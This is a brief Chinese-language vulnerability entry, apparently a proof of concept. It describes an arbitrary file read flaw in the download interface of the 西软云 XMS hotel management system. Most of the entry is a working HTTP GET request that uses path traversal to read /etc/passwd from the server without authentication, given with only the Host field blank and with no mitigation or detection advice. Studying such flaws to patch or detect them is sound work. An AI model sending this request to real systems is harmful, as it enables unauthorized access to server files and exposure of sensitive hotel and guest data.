漏洞描述
西软云 XMS 是基于云平台数据中心开发的支持多酒店、多语言、多平台的酒店管理系统。西软云XMS download接口存在任意文件读取漏洞。未经授权的远程攻击者可以利用该漏洞,造成敏感信息泄露。
GET /FoxhisFileServer/action?method=download&filename=/..//..//..//..//..//..//..//..//..//..//..//../etc/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36